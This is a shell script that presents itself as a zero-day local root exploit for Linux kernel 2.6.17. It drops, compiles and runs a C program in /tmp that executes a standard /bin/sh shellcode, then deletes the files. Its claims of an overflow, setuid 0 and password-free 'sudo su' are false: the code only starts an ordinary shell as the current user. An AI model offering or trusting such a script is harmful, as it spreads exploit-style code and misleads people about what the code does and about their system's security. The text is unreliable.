#!/bin/sh
# 0day Kernel 2.6.17 Local Root Xploit
# Overflow and setuid 0
# use "sudo su" for root login without password...
cat > /tmp/xploit.c << __EOF__
#include <stdio.h>
char shellcode[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
int main()
{
void (*fp) (void);
fp = (void *)shellcode;
fp();
}
__EOF__
echo "$ 0day Kernel 2.6.17 Local Root by krupt"
echo "$ PoC & Xploit: krupt <iamkrupt@gmail.com>"
echo "$ Shellcode: unknown "
echo "$[*]"
echo "$[*]"
echo "$ Please wait xploit executed now..."
cd /tmp
cc -o xploit xploit.c
chmod 777 xploit
echo "$ Now u can login as root without password"
echo "$ Execute 'sudo su' command and show the magic "
echo "$ Root Shell spawning "
./xploit
rm xploit
rm xploit.c
Saludos
